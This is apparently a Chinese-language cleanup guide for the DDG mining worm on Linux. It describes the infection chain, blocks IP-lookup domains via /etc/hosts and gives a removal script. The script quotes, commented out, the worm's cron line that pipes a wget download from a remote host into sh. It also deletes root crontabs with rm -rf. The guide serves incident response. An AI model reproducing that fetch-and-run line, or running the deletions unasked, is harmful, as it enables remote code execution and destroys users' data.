源头 : /tmp/ddg.2020
1.下载配置数据库,用来攻击其他电脑;
2.从配置中获取http服务器,下载i.sh的脚本;
3.将脚本插入到系统的cron中,定时执行;
4.执行脚本,将挖矿程序下载到本地,开始挖矿;
根据以上流程,可以从各个点来切断传播;
1. 切断第一步,让其无法获取配置文件,程序会先获取自身所在电脑的公网IP,
当获取不到公网IP之后,就没有然后了。。。以下从几个域名中可获取公网IP:
ident.me
v4.ident.me
ipinfo.io
ipecho.net
ipv4.icanhazip.com
ifconfig.co
在linux上 加入到 /etc/hosts
127.0.0.1 v4.ident.me
127.0.0.1 ipinfo.io
127.0.0.1 ipecho.net
127.0.0.1 ipv4.icanhazip.com
127.0.0.1 ifconfig.co
2.切断第三步,让其无法自动执行
删除该路径下面的所有文件 /var/spool/cron
3.切断第四步,删除所有恶意程序
删除 /tmp/ddg.2020 /tmp/wnTKYg
必须要立马修改密码, 清除脚本
#!/bin/sh
#ver 1.1
chmod -x /tmp/ddg.2020 /tmp/wnTKYg
killall ddg.2020 wnTKYg
echo "as" > /tmp/ddg.2020
echo "as" > /tmp/wnTKYg
killall ddg.2020 wnTKYg
ps auxf | grep -v grep | grep ddg. | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep wnTKYg | awk '{print $2}' | xargs kill
rm -rf /var/spool/cron/root
rm -rf /var/spool/cron/crontabs/root
#echo "* * * * * wget -q -O- http://10.0.22.61:9443/i.sh | sh" >> /var/spool/cron/crontabs/root
killall ddg.2020 wnTKYg
rm -rf /tmp/ddg.2020
rm -rf /tmp/wnTKYg
killall ddg.2020 wnTKYg
ps auxf | grep -v grep | grep ddg. | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep wnTKYg | awk '{print $2}' | xargs kill
=勿转载~~